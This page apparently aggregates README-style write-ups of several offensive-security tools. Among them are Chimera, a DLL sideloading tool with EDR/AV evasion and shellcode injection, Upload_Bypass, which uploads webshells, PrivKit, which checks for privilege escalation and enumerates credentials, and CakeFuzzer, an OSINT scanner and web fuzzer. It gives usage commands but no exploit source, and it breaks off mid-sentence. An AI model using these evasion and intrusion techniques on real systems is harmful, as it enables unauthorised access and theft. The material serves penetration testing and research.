HackBot utilizes the powerful language model Meta-LLama2 through the "LlamaCpp" library. This allows HackBot to respond to your questions in a coherent and relevant manner. Please make sure to keep your queries in English and adhere to the guidelines provided to get the best results from HackBot.


Features

  • AI Cybersecurity Chat: HackBot can answer various cybersecurity-related queries, helping you with penetration testing, security analysis, and more.
  • Interactive Interface: The chatbot provides an interactive command-line interface, making it easy to have conversations with HackBot.
  • Clear Output: HackBot presents its responses in a well-formatted markdown, providing easily readable and organized answers.
  • Static Code Analysis: Utilizes the provided scan data or log file for conducting static code analysis. It thoroughly examines the source code without executing it, identifying potential vulnerabilities, coding errors, and security issues.
  • Vulnerability Analysis: Performs a comprehensive vulnerability analysis using the provided scan data or log file. It identifies and assesses security weaknesses, misconfigurations, and potential exploits present in the target system or network.

How it looks

Chat:

Static Code analysis:

Vulnerability analysis:

Installation

Prerequisites

Before you proceed with the installation, ensure you have the following prerequisites:

Step 1: Clone the Repository

git clone https://github.com/morpheuslord/hackbot.git
cd hackbot

Step 2: Install Dependencies

pip install -r requirements.txt

Step 3: Download the AI Model

python hackbot.py

The first time you run HackBot, it will check for the AI model required for the chatbot. If the model is not present, it will be automatically downloaded and saved as "llama-2-7b-chat.ggmlv3.q4_0.bin" in the project directory.

Usage

To start a conversation with HackBot, run the following command:

python hackbot.py

HackBot will display a banner and wait for your input. You can ask cybersecurity-related questions, and HackBot will respond with informative answers. To exit the chat, simply type "quit_bot" in the input prompt.

Here are some additional commands you can use:

  • clear_screen: Clears the console screen for better readability.
  • quit_bot: This is used to quit the chat application
  • bot_banner: Prints the default bots banner.
  • contact_dev: Provides my contact information.
  • save_chat: Saves the current sessions interactions.
  • vuln_analysis: Does a Vuln analysis using the scan data or log file.
  • static_code_analysis: Does a Static code analysis using the scan data or log file.

Note: I am working on more addons and more such commands to give a more chatGPT experience

Please Note: HackBot's responses are based on the Meta-LLama2 AI model, and its accuracy depends on the quality of the queries and data provided to it.

I am also working on AI training by which I can teach it how to be more accurately tuned to work for hackers on a much more professional level.

Contributing

We welcome contributions to improve HackBot's functionality and accuracy. If you encounter any issues or have suggestions for enhancements, please feel free to open an issue or submit a pull request. Follow these steps to contribute:

  1. Fork the repository.
  2. Create a new branch with a descriptive name.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request to the main branch of this repository.

Please maintain a clean commit history and adhere to the project's coding guidelines.

AI training

If anyone with the know-how of training text generation models can help improve the code.

Contact

For any questions, feedback, or inquiries related to HackBot, feel free to contact the project maintainer:



InfoHound - An OSINT To Extract A Large Amount Of Data Given A Web Domain Name

By: Zion3R


During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization. InfoHound performs passive analysis techniques (which do not interact directly with the target) using OSINT to extract a large amount of data given a web domain name. This tool will retrieve emails, people, files, subdomains, usernames and urls that will be later analyzed to extract even more valuable information.


Infohound architecture

Installation

git clone https://github.com/xampla/InfoHound.git
cd InfoHound/infohound
mv infohound_config.sample.py infohound_config.py
cd ..
docker-compose up -d

You must add API Keys inside infohound_config.py file

Default modules

InfoHound has 2 different types of modules, those which retreives data and those which analyse it to extract more relevant information.

 Retrievval modules

Name Description
Get Whois Info Get relevant information from Whois register.
Get DNS Records This task queries the DNS.
Get Subdomains This task uses Alienvault OTX API, CRT.sh, and HackerTarget as data sources to discover cached subdomains.
Get Subdomains From URLs Once some tasks have been performed, the URLs table will have a lot of entries. This task will check all the URLs to find new subdomains.
Get URLs It searches all URLs cached by Wayback Machine and saves them into the database. This will later help to discover other data entities like files or subdomains.
Get Files from URLs It loops through the URLs database table to find files and store them in the Files database table for later analysis. The files that will be retrieved are: doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, odt, ods, odg, odp, sxw, sxc, sxi, pdf, wpd, svg, indd, rdp, ica, zip, rar
Find Email It looks for emails using queries to Google and Bing.
Find People from Emails Once some emails have been found, it can be useful to discover the person behind them. Also, it finds usernames from those people.
Find Emails From URLs Sometimes, the discovered URLs can contain sensitive information. This task retrieves all the emails from URL paths.
Execute Dorks It will execute the dorks defined in the dorks folder. Remember to group the dorks by categories (filename) to understand their objectives.
Find Emails From Dorks By default, InfoHound has some dorks defined to discover emails. This task will look for them in the results obtained from dork execution.

Analysis

Name Description
Check Subdomains Take-Over It performs some checks to determine if a subdomain can be taken over.
Check If Domain Can Be Spoofed It checks if a domain, from the emails InfoHound has discovered, can be spoofed. This could be used by attackers to impersonate a person and send emails as him/her.
Get Profiles From Usernames This task uses the discovered usernames from each person to find profiles from services or social networks where that username exists. This is performed using the Maigret tool. It is worth noting that although a profile with the same username is found, it does not necessarily mean it belongs to the person being analyzed.
Download All Files Once files have been stored in the Files database table, this task will download them in the "download_files" folder.
Get Metadata Using exiftool, this task will extract all the metadata from the downloaded files and save it to the database.
Get Emails From Metadata As some metadata can contain emails, this task will retrieve all of them and save them to the database.
Get Emails From Files Content Usually, emails can be included in corporate files, so this task will retrieve all the emails from the downloaded files' content.
Find Registered Services using Emails It is possible to find services or social networks where an email has been used to create an account. This task will check if an email InfoHound has discovered has an account in Twitter, Adobe, Facebook, Imgur, Mewe, Parler, Rumble, Snapchat, Wordpress, and/or Duolingo.
Check Breach This task checks Firefox Monitor service to see if an email has been found in a data breach. Although it is a free service, it has a limitation of 10 queries per day. If Leak-Lookup API key is set, it also checks it.

Custom modules

InfoHound lets you create custom modules, you just need to add your script inside infohoudn/tool/custom_modules. One custome module has been added as an example which uses Holehe tool to check if the emails previously are attached to an account on sites like Twitter, Instagram, Imgur and more than 120 others.

Inspired by



Chimera - Automated DLL Sideloading Tool With EDR Evasion Capabilities

By: Zion3R


While DLL sideloading can be used for legitimate purposes, such as loading necessary libraries for a program to function, it can also be used for malicious purposes. Attackers can use DLL sideloading to execute arbitrary code on a target system, often by exploiting vulnerabilities in legitimate applications that are used to load DLLs.

To automate the DLL sideloading process and make it more effective, Chimera was created a tool that include evasion methodologies to bypass EDR/AV products. These tool can automatically encrypt a shellcode via XOR with a random key and create template Images that can be imported into Visual Studio to create a malicious DLL.

Also Dynamic Syscalls from SysWhispers2 is used and a modified assembly version to evade the pattern that the EDR search for, Random nop sleds are added and also registers are moved. Furthermore Early Bird Injection is also used to inject the shellcode in another process which the user can specify with Sandbox Evasion mechanisms like HardDisk check & if the process is being debugged. Finally Timing attack is placed in the loader which using waitable timers to delay the execution of the shellcode.

This tool has been tested and shown to be effective at bypassing EDR/AV products and executing arbitrary code on a target system.


Tool Usage

Chimera is written in python3 and there is no need to install any extra dependencies.

Chimera currently supports two DLL options either Microsoft teams or Microsoft OneDrive.

Someone can create userenv.dll which is a missing DLL from Microsoft Teams and insert it to the specific folder to

⁠%USERPROFILE%/Appdata/local/Microsoft/Teams/current

For Microsoft OneDrive the script uses version DLL which is common because its missing from the binary example onedriveupdater.exe

Chimera Usage.

python3 ./chimera.py met.bin chimera_automation notepad.exe teams

python3 ./chimera.py met.bin chimera_automation notepad.exe onedrive

Additional Options

  • [raw payload file] : Path to file containing shellcode
  • [output path] : Path to output the C template file
  • [process name] : Name of process to inject shellcode into
  • [dll_exports] : Specify which DLL Exports you want to use either teams or onedrive
  • [replace shellcode variable name] : [Optional] Replace shellcode variable name with a unique name
  • [replace xor encryption name] : [Optional] Replace xor encryption name with a unique name
  • [replace key variable name] : [Optional] Replace key variable name with a unique name
  • [replace sleep time via waitable timers] : [Optional] Replace sleep time your own sleep time

Usefull Note

Once the compilation process is complete, a DLL will be generated, which should include either "version.dll" for OneDrive or "userenv.dll" for Microsoft Teams. Next, it is necessary to rename the original DLLs.

For instance, the original "userenv.dll" should be renamed as "tmpB0F7.dll," while the original "version.dll" should be renamed as "tmp44BC.dll." Additionally, you have the option to modify the name of the proxy DLL as desired by altering the source code of the DLL exports instead of using the default script names.

Visual Studio Project Setup

Step 1: Creating a New Visual Studio Project with DLL Template

  1. Launch Visual Studio and click on "Create a new project" or go to "File" -> "New" -> "Project."
  2. In the project templates window, select "Visual C++" from the left-hand side.
  3. Choose "Empty Project" from the available templates.
  4. Provide a suitable name and location for the project, then click "OK."
  5. On the project properties window, navigate to "Configuration Properties" -> "General" and set the "Configuration Type" to "Dynamic Library (.dll)."
  6. Configure other project settings as desired and save the project. 

 

Step 2: Importing Images into the Visual Studio Project

  1. Locate the "chimera_automation" folder containing the necessary Images.
  2. Open the folder and identify the following Images: main.c, syscalls.c, syscallsstubs.std.x64.asm.
  3. In Visual Studio, right-click on the project in the "Solution Explorer" panel and select "Add" -> "Existing Item."
  4. Browse to the location of each file (main.c, syscalls.c, syscallsstubs.std.x64.asm) and select them one by one. Click "Add" to import them into the project.
  5. Create a folder named "header_Images" within the project directory if it doesn't exist already.
  6. Locate the "syscalls.h" header file in the "header_Images" folder of the "chimera_automation" directory.
  7. Right-click on the "header_Images" folder in Visual Studio's "Solution Explorer" panel and select "Add" -> "Existing Item."
  8. Browse to the location of "syscalls.h" and select it. Click "Add" to import it into the project.

Step 3: Build Customization

  1. In the project properties window, navigate to "Configuration Properties" -> "Build Customizations."
  2. Click the "Build Customizations" button to open the build customization dialog.

Step 4: Enable MASM

  1. In the build customization dialog, check the box next to "masm" to enable it.
  2. Click "OK" to close the build customization dialog.

 

Step 5:

  1. Right click in the assembly file → properties and choose the following
  2. Exclude from build → No
  3. Content → Yes
  4. Item type → Microsoft Macro Assembler


Final Project Setup


Compiler Optimizations

Step 1: Change optimization

  1. In Visual Studio choose Project → properties
  2. C/C++ Optimization and change to the following

 

Step 2: Remove Debug Information's

  1. In Visual Studio choose Project → properties
  2. Linker → Debugging → Generate Debug Info → No


Liability Disclaimer:

To the maximum extent permitted by applicable law, myself(George Sotiriadis) and/or affiliates who have submitted content to my repo, shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses, resulting from (i) your access to this resource and/or inability to access this resource; (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties; (iii) any content obtained from this resource

References

https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection

https://evasions.checkpoint.com/

https://github.com/Flangvik/SharpDllProxy

https://github.com/jthuraisamy/SysWhispers2

https://systemweakness.com/on-disk-detection-bypass-avs-edr-s-using-syscalls-with-legacy-instruction-series-of-instructions-5c1f31d1af7d

https://github.com/Mr-Un1k0d3r



Upload_Bypass - File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques Covered In Hacktricks

By: Zion3R


Upload_Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.

  • Simplifies the identification and exploitation of vulnerabilities in file upload mechanisms.
  • Leverages bug bounty techniques to maximize testing effectiveness.
  • Enables thorough assessments of web applications.
  • Provides an intuitive and user-friendly interface.
  • Enhances security assessments and helps protect critical systems.

New PoC Video:

Disclaimer

Please note that the use of Upload_Bypass and any actions taken with it are solely at your own risk. The tool is provided for educational and testing purposes only. The developer of Upload_Bypass is not responsible for any misuse, damage, or illegal activities caused by its usage.

While Upload_Bypass aims to assist Pentesters and Bug Hunters in testing file upload mechanisms, it is essential to obtain proper authorization and adhere to applicable laws and regulations before performing any security assessments. Always ensure that you have the necessary permissions from the relevant stakeholders before conducting any testing activities.

The results and findings obtained from using Upload_Bypass should be communicated responsibly and in accordance with established disclosure processes. It is crucial to respect the privacy and integrity of the tested systems and refrain from causing harm or disruption.

By using Upload_Bypass, you acknowledge that the developer cannot be held liable for any consequences resulting from its use. Use the tool responsibly and ethically to promote the security and integrity of web applications.

Features

  1. Webshell mode: The tool will try to upload a Webshell with a random name, and if the user specifies the location of the uploaded file, the tool enters an "Interactive shell".
  2. Eicar mode: The tool will try to upload an Eicar(Anti-Malware test file) instead of a Webshell, and if the user specifies the location of the uploaded file, the tool will check if the file uploaded successfully and exists in the system in order to determine if an Anti-Malware is present on the system.
  3. A directory with the name of the tested host will be created in the Tool's directory upon success, with the results saved in Excel and Text files.

Download:

Download the latest version from Releases page.

Installation:

pip install -r requirements.txt

Limitations:

The tool will not function properly if the file upload mechanism includes CAPTCHA implementation.

Perhaps in the future the tool will include an OCR.

Usage:

Attension

The Tool is compatible exclusively with output file requests generated by Burp Suite.

Before saving the Burp file, replace the file content with the string *content* and filename.ext with the string *filename* and Content-Type header with *mimetype*(only if the tool is not able to recognize it automatically).

How a request should look before the changes:


How it should look after the changes:


If the tool fails to recognize the mime type automatically, you can add *mimetype* in the parameter's value of the Content-Type header.

Options: -h, --help

 show this help message and exit

-b BURP_FILE, --burp-file BURP_FILE

 Required - Read from a Burp Suite file
Usage: -b / --burp-file ~/Desktop/output

-s SUCCESS_MESSAGE, --success SUCCESS_MESSAGE

 Required if -f is not set - Provide the success message when a file is uploaded
Usage: -s /--success 'File uploaded successfully.'

-f FAILURE_MESSAGE, --failure FAILURE_MESSAGE

 Required if -s is not set - Provide a failure message when a file is uploaded
Usage: -f /--failure 'File is not allowed!'

-e FILE_EXTENSION, --extension FILE_EXTENSION

 Required - Provide server backend extension
Usage: -e / --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)

-a ALLOWED_EXTENSIONS, --allowed ALLOWED_EXTENSIONS

 Required - Provide allowed extensions to be uploaded
Usage: -a /--allowed jpeg, png, zip, etc'

-l WEBSHELL_LOCATION, --location WEBSHELL_LOCATION

  Provide a remote path where the WebShell will be uploaded (won't work if the file will be uploaded with a UUID).
Usage: -l / --location /uploads/

-rl NUMBER, --rate-limit NUMBER

  Set rate-limiting with milliseconds between each request.
Usage: -r / --rate-limit 700

-p PROXY_NUM, --proxy PROXY_NUM

  Channel the HTTP requests via proxy client (i.e Burp Suite).
Usage: -p / --proxy http://127.0.0.1:8080

-S, --ssl

  If set, the tool will not validate TLS/SSL certificate.
Usage: -S / --ssl

-c, --continue

  If set, the brute force will continue even if one of the methods gets a hit!
Usage: -C /--continue

-E, --eicar

  If set, an Eicar file(Anti Malware Testfile) will be uploaded only. WebShells will not be uploaded (Suitable for real environments).
Usage: -E / --eicar

-v, --verbose

  If set, details about the test will be printed on the screen
Usage: -v / --verbose

-r, --response

  If set, HTTP response will be printed on the screen
Usage: -r / --response

--version

  Print the current version of the tool.     

--update

  Checks for new updates. If there is a new update, it will be downloaded and updated automatically.     

Examples

Running the tool with Eicar and Bruteforce mode along with a verbose output

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e php -a jpeg --response -v --eicar --continue

Running the tool with Webshell mode along with a verbose output

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e asp -a zip -v

Running the tool with a Proxy client

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e jsp -a png -v --proxy http://127.0.0.1:8080


PrivKit - Simple Beacon Object File That Detects Privilege Escalation Vulnerabilities Caused By Misconfigurations On Windows OS

By: Zion3R


PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.


PrivKit detects following misconfigurations

 Checks for Unquoted Service Paths
Checks for Autologon Registry Keys
Checks for Always Install Elevated Registry Keys
Checks for Modifiable Autoruns
Checks for Hijackable Paths
Enumerates Credentials From Credential Manager
Looks for current Token Privileges

Usage

[03/20 00:51:06] beacon> privcheck
[03/20 00:51:06] [*] Priv Esc Check Bof by @merterpreter
[03/20 00:51:06] [*] Checking For Unquoted Service Paths..
[03/20 00:51:06] [*] Checking For Autologon Registry Keys..
[03/20 00:51:06] [*] Checking For Always Install Elevated Registry Keys..
[03/20 00:51:06] [*] Checking For Modifiable Autoruns..
[03/20 00:51:06] [*] Checking For Hijackable Paths..
[03/20 00:51:06] [*] Enumerating Credentials From Credential Manager..
[03/20 00:51:06] [*] Checking For Token Privileges..
[03/20 00:51:06] [+] host called home, sent: 10485 bytes
[03/20 00:51:06] [+] received output:
Unquoted Service Path Check Result: Vulnerable service path found: c:\program files (x86)\grasssoft\macro expert\MacroService.exe

Simply load the cna file and type "privcheck"
If you want to compile by yourself you can use:
make all
or
x86_64-w64-mingw32-gcc -c cfile.c -o ofile.o

If you want to look for just one misconf you can use object file with "inline-execute" for example
inline-execute /path/tokenprivileges.o

Acknowledgement

Mr.Un1K0d3r - Offensive Coding Portal
https://mr.un1k0d3r.world/portal/

Outflank - C2-Tool-Collection
https://github.com/outflanknl/C2-Tool-Collection

dtmsecurity - Beacon Object File (BOF) Creation Helper
https://github.com/dtmsecurity/bof_helper

Microsoft :)
https://learn.microsoft.com/en-us/windows/win32/api/

HsTechDocs by HelpSystems(Fortra)
https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm



LFI-FINDER - Tool Focuses On Detecting Local File Inclusion (LFI) Vulnerabilities

By: Zion3R

Written by TMRSWRR

Version 1.0.0

Instagram: TMRSWRR


How to use

LFI-FINDER is an open-source tool available on GitHub that focuses on detecting Local File Inclusion (LFI) vulnerabilities. Local File Inclusion is a common security vulnerability that allows an attacker to include files from a web server into the output of a web application. This tool automates the process of identifying LFI vulnerabilities by analyzing URLs and searching for specific patterns indicative of LFI. It can be a useful addition to a security professional's toolkit for detecting and addressing LFI vulnerabilities in web applications.

This tool works with geckodriver, search url for LFI Vuln and when get an root text on the screen, it notifies you of the successful payload.

Installation

git clone https://github.com/capture0x/LFI-FINDER/
cd LFI-FINDER
bash setup.sh
pip3 install -r requirements.txt
chmod -R 755 lfi.py
python3 lfi.py

THIS IS FOR LATEST GOOGLE CHROME VERSION

Bugs and enhancements

For bug reports or enhancements, please open an issue here.

Copyright 2023



Artemis - APK Infrastructure Investigator

By: Zion3R

Overview

A tools for Find APK Infrastructure .

HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.


Installation

pip install -r requirements.txt  
python main.py

Command Line Options

          
--help Display help
--path Required path of apk file
--manifest Display manifest informations
--infra Find all infra addresses included ip,domain ex. --infra ip,domain
--whoise Whoise all infra included ip,domain ex. --whoise ip,domain
--output Set output files ex. --output out.txt

Usage

Display Manifest

APK Infrastructure Investigator (3)

IP Whois

APK Infrastructure Investigator (4)

Example Usage:

1.Find infra(domain and ip) in sample4.apk and set output result into out.txt

python3 main.py --path sample4.apk --infra domain,ip --output out.txt
  1. Investigate the Domain and IP on the APK
python3 main.py --path sample.apk --whois ip


Wallet-Transaction-Monitor - This Script Monitors A Bitcoin Wallet Address And Notifies The User When There Are Changes In The Balance Or New Transactions

By: Zion3R


This script monitors a Bitcoin wallet address and notifies the user when there are changes in the balance or new transactions. It provides real-time updates on incoming and outgoing transactions, along with the corresponding amounts and timestamps. Additionally, it can play a sound notification on Windows when a new transaction occurs.

    Requirements

    Python 3.x requests library: You can install it by running pip install requests. winsound module: This module is available by default on Windows.

    How to Run

    • Make sure you have Python 3.x installed on your system.
    • pip install -r requirements.txt
    • Clone or download the script file wallet_transaction_monitor.py from this repository.
    • Place the sound file (in .wav format) you want to use for the notification in the same directory as the script. Make sure to replace "soundfile.wav" in the script with the actual filename of your sound file.
    • Open a terminal or command prompt and navigate to the directory where the script is located.
    • Run the script by executing the following command:
    python wallet_transaction_monitor.py

    The script will start monitoring the wallet and display updates whenever there are changes in the balance or new transactions. It will also play the specified sound notification on Windows.

    Important Notes

    This script is designed to work on Windows due to the use of the winsound module for sound notifications. If you are using a different operating system, you may need to modify the sound-related code or use an alternative method for audio notifications. The script uses the Blockchain.info API to fetch wallet data. Please ensure you have a stable internet connection for the script to work correctly. It's recommended to run the script in the background or keep the terminal window open while monitoring the wallet.



    CakeFuzzer - Automatically And Continuously Discover Vulnerabilities In Web Applications Created Based On Specific Frameworks

    By: Zion3R


    Cake Fuzzer is a project that is meant to help automatically and continuously discover vulnerabilities in web applications created based on specific frameworks with very limited false positives. Currently it is implemented to support the Cake PHP framework.

    If you would like to learn more about the research process check out this article series: CakePHP Application Cybersecurity Research


    Project goals

    Typical approaches to discovering vulnerabilities using automated tools in web applications are:

    • Static Application Security Testing (SAST) – Method that involves a scanner detecting vulnerabilities based on the source code without running the application
    • Dynamic Application Security Testing (DAST) – Method that incorporates a vulnerability scanner that attacks the running application and identifies the vulnerabilities based on the application responses

    Both methods have disadvantages. SAST results in a high percentage of false positives – findings that are either not vulnerabilities or not exploitable vulnerabilities. DAST results in fewer false positives but discovers fewer vulnerabilities due to the limited information. It also requires some knowledge about the application and a security background of a person who runs a scan. This often comes with a custom scan configuration per application to work properly.

    The Cake Fuzzer project is meant to combine the advantages of both approaches and eliminate the above-mentioned disadvantages. This approach is called Interactive Application Security Testing (IAST).

    The goals of the project are:

    • Create an automated process of discovering vulnerabilities in applications based on the CakePHP Framework
    • No application knowledge requirement or pre-configuration of the web application
    • Result with minimal or close to 0 amount of false positives
    • Require minimal security knowledge to run the scanner

    Note: Some classes of vulnerabilities are not the target of the Cake Fuzzer, therefore Cake Fuzzer will not be able to detect them. Examples of those classes are business logic vulnerabilities and access control issues.

    Architecture

    Overview

    Drawio: Cake Fuzzer Architecture

    Cake Fuzzer consists of 3 main (fairly independent) servers that in total allow for dynamic vulnerability testing of CakePHP allications.

    • AttackQueue - Scheduling and execution of attack scenarios.
    • Monitors - Monitoring of given entities (executor outputs / file contents / processes / errors ).
    • Registry - Storage and classification of found vulnerabilities. They run independently. AttackQueue can add new scanners to monitors, and Monitors can schedule new attacks (eg based on found vulnerability to further attack application).

    Other components include:

    • Fuzzer - defines and schedules attacks to AttackQueue (serves as entry)
    • Configuration - sets up application dependent info (eg. path to CakePHP application)
    • Instrumentation - based on configuration defines changes to the application / os to prepare the ground for attacks.

    Approach

    Cake Fuzzer is based on the concept of Interactive Application Security Testing (IAST). It contains a predefined set of attacks that are randomly modified before the execution. Cake Fuzzer has the knowledge of the application internals thanks to the Cake PHP framework therefore the attacks will be launched on all possible entry points of the application.

    During the attack, the Cake Fuzzer monitors various aspects of the application and the underlying system such as:

    • network connection,
    • file system,
    • application response,
    • error logs.

    These sources of information allow Cake Fuzzer to identify more vulnerabilities and report them with higher certainty.

    Requirements

    Development environment using MISP on VMWare virtual machine

    The following section describes steps to setup a Cake Fuzzer development environment where the target is outdated MISP v2.4.146 that is vulnerable to CVE-2021-41326.

    Requirements

    • VMWare Workstation (Other virtualization platform can be used as long as they support sharing/mounting directories between host and guest OS)

    Steps

    Run the following commands on your host operating system to download an outdated MISP VM:

    cd ~/Downloads # Or wherever you want to store the MISP VM
    wget https://vm.misp-project.org/MISP_v2.4.146@0c25b72/MISP_v2.4.146@0c25b72-VMware.zip -O MISP.zip
    unzip MISP.zip
    rm MISP.zip
    mv VMware/ MISP-2.4.146

    Conduct the following actions in VMWare GUI to prepare sharing Cake Fuzzer files between your host OS and MISP:

    1. Open virtual machine in VMWare and go to > Settings > Options > Shared Folders > Add.
    2. Mount directory where you keep Cake Fuzzer on your host OS and name it cake_fuzzer on the VM.
    3. Start the VM.
    4. Note the IP address displayed in the VMWare window after MISP fully boots up.

    Run the following commands on your host OS (replace MISP_IP_ADDRESS with previously noted IP address):

    ssh-copy-id misp@MISP_IP_ADDRESS
    ssh misp@MISP_IP_ADDRESS

    Once you SSH into the MISP run the following commands (in MISP terminal) to finish setup of sharing Cake Fuzzer files between host OS and MISP:

    instrumentation (one of the patches) sudo vmhgfs-fuse .host:/cake_fuzzer /cake_fuzzer -o allow_other -o uid=1000 ls -l /cake_fuzzer # If everything went fine you should see content of the Cake Fuzzer directory from your host OS. Any changes on your host OS will be reflected inside the VM and vice-versa." dir="auto">
    sudo apt update
    sudo apt-get -y install open-vm-tools open-vm-tools-desktop
    sudo apt-get -y install build-essential module-assistant linux-headers-virtual linux-image-virtual && sudo dpkg-reconfigure open-vm-tools
    sudo mkdir /cake_fuzzer # Note: This path is fixed as it's hardcoded in the instrumentation (one of the patches)
    sudo vmhgfs-fuse .host:/cake_fuzzer /cake_fuzzer -o allow_other -o uid=1000
    ls -l /cake_fuzzer # If everything went fine you should see content of the Cake Fuzzer directory from your host OS. Any changes on your host OS will be reflected inside the VM and vice-versa.

    Prepare MISP for simple testing (in MISP terminal):

    CAKE=/var/www/MISP/app/Console/cake
    SUDO='sudo -H -u www-data'
    $CAKE userInit -q
    $SUDO $CAKE Admin setSetting "Security.password_policy_length" 1
    $SUDO $CAKE Admin setSetting "Security.password_policy_complexity" '/.*/'
    $SUDO $CAKE Password admin@admin.test admin --override_password_change

    Finally instal Cake Fuzzer dependencies and prepare the venv (in MISP terminal):

    source /cake_fuzzer/precheck.sh

    Contribution to Vulnerability Database

    Cake Fuzzer scans for vulnerabilities that inside of /cake_fuzzer/strategies folder.

    To add a new attack we need to add a new new-attack.json file to strategies folder. Each vulnerability contains 2 major fileds:Scenarios and Scanners. Scenarios where attack payloads base forms stored. Scanners in the other hand detecting regex or pharases for response, stout, sterr, logs, and results.

    Creating payload for Scenarios

    To create a payload first you need to have the understanding of the vulnerability and how to detect it with as few payloads as possible.

    • While constructing the scenario you should think of as most generic payload as possible. However, the more generic payload, the more chances are that it will produce false-positives.

    • It is preferable to us a canary value such as__cakefuzzer__new-attack_§CAKEFUZZER_PAYLOAD_GUID§__ in your scenarios. Canary value contains a fixed string (for example: __cakefuzzer__new-attack_) and a dynamic identifier that will be changed dynamically by the fuzzer (GUID part §CAKEFUZZER_PAYLOAD_GUID§). First canary part is used to ensure that payload is detected by Scanners. Second canary part, the GUID is translated to pseudo-random value on every execution of your payload. So whenever your payload will be injected into the a parameter used by the application, the canary will be changed to something like this: __cakefuzzer__new-attack_8383938__, where the 8383938 is unique across all other attacks.

    Detecting and generating Scanners

    To create a scanner, first you need to understand how may the application behave when the vulnerability is triggered. There are few scanner types that you can use such as response, sterr, logs, files, and processes. Each scanner serves a different purpose.

    For example when you building a scanner for an XSS, you will look for the indication of the vulnerability in the HTML response of the application. You can use ResultOutputScanner scanner to look for canary value and payload. In other hand SQL Injection vulnerabilities could be detected via error logs. For that purpose you can use LogFilesContentsScanner and ResultErrorsScanner.

    • One of the important points of creating a scanner is finding a regular expression or a pharase that does not catch false-positive values. If you want to contribute a new vulnerability, you should ensure that there is no false-positive by using the new vulnerability in scans.
    • Last attribute of these Scanner regular expressions is generating an efficent regex. Avoid using regex that match all cases .* or .+. They are very time consuming and drasticly increase the time required to finish the entire scan.

    Efficiency

    As mentioned before efficiency is important part of the vulnerabilities. Both Scenarios and Scanners should include as few elements as possible. This is because Cake Fuzzer executes every single scenario in all possible detected paths multiple times. On the other hand, all responses, new log entries, etc. are constantly checked by the Scanners. There should be a lot of parameters, paths, and end-points detected and therefore using more payload or Scanner affects the efficiency quite a lot.

    Removing Specific Vulnerability

    If do not want to scan a specific vulnerability class, remove specified json file from the strategies folder, clean the database and run the fuzzer again.

    For example if you do not want to scan your applicaiton for SQL Injection vulnerabilities, do the following steps:

    First of all remove already prepared attack scenarios. To achive this delete all files inside of the /cake_fuzzer/databases folder:

    rm  /cake_fuzzer/databases/*

    After that remove the sqlinj.json file from the /cake_fuzzer/strategies

    rm /cake_fuzzer/strategies/sqlinj.json

    Finally re-run the fuzzer and all cake_fuzzer running proccess without any SQL Injection attack executed.

    PoC Usage

    Installation

    Clone respository

    git clone https://github.com/Zigrin-Security/CakeFuzzer /cake_fuzzer

    Warning Cake Fuzzer won't work properly if it's under different path than /cake_fuzzer. Keep in mind that it has to be placed under the root directory of the file system, next /root, /tmp, and so on.

    Change directory to respository

    cd /cake_fuzzer

    Venv

    Enter virtual environment if you are not already in:

    source /cake_fuzzer/precheck.sh

    OR

    source venv/bin/activate

    Configuration

    cp config/config.example.ini config/config.ini

    Configure config/config.ini:

    WEBROOT_DIR="/var/www/html"         # Path to the tested applications `webroot` directory
    CONCURRENT_QUEUES=5 # [Optional] Number of attacks executed concurretnly at once
    ONLY_PATHS_WITH_PREFIX="/" # [Optional] Fuzzer will generates only attacks for attacks starting with this prefix
    EXCLUDE_PATHS="" # [Optional] Fuzzer will exlude from scanning all paths that match this regular expression. If it's empty, all paths will be processed
    PAYLOAD_GUID_PHRASE="§CAKEFUZZER_PAYLOAD_GUID§" # [Optional] Internal keyword that is substituted right before attack with unique payload id
    INSTRUMENTATION_INI="config/instrumentation_cake4.ini" # [Optional] Path to custom instrumentations of the application.

    Execution

    Start component processes

    Warning During the Cake Fuzzer scan, multiple functionalities of your application will be invoked in uncontrolled manner multiple times. This may result issuing connections to external services your application is connected to, and pulling or pushing data from/to it. It is highly recommended to run Cake Fuzzer in isolated controlled environment without access to sensitive external services.

    Note Cake Fuzzer bypass blackholing, CSRF protections, and authorization. It sends all attacks with privileges of a first user in the database. It is recommended that this user has the highest permissions.

    The application consists of several components.

    Warning All cake_fuzzer commands have to be executed as root.

    Before starting the fuzzer make sure your target application is fully instrumented:

    python cake_fuzzer.py instrument check

    If there are some unapplied changes apply them with:

    python cake_fuzzer.py instrument apply

    To run cake fuzzer do the following (It's recommended to use at least 3 separate terminal):

    # First Terminal
    python cake_fuzzer.py run fuzzer # Generates attacks, adds them to the QUEUE and registers new SCANNERS (then exits)
    python cake_fuzzer.py run periodic_monitors # Responsible for monitoring (use CTRL+C to stop & exit at the end of the scan)

    # Second terminal
    python cake_fuzzer.py run iteration_monitors # Responsible for monitoring (use CTRL+C to stop & exit at the end of the scan)

    # Third terminal
    python cake_fuzzer.py run attack_queue # Starts the ATTACK QUEUE (use CTRL+C to stop & exit at the end of the scan)

    # Once all attacks are executed
    python cake_fuzzer.py run registry # Generates `results.json` based on found vulnerabilities

    Note: There is currently a bug that can change the owner of logs (or any other dynamically changed filies of the target web app). This may cause errors when normally using the web application or even false-negatives on future Cake Fuzzer executions. For MISP we recommend running the following after every execution of the fuzzer:

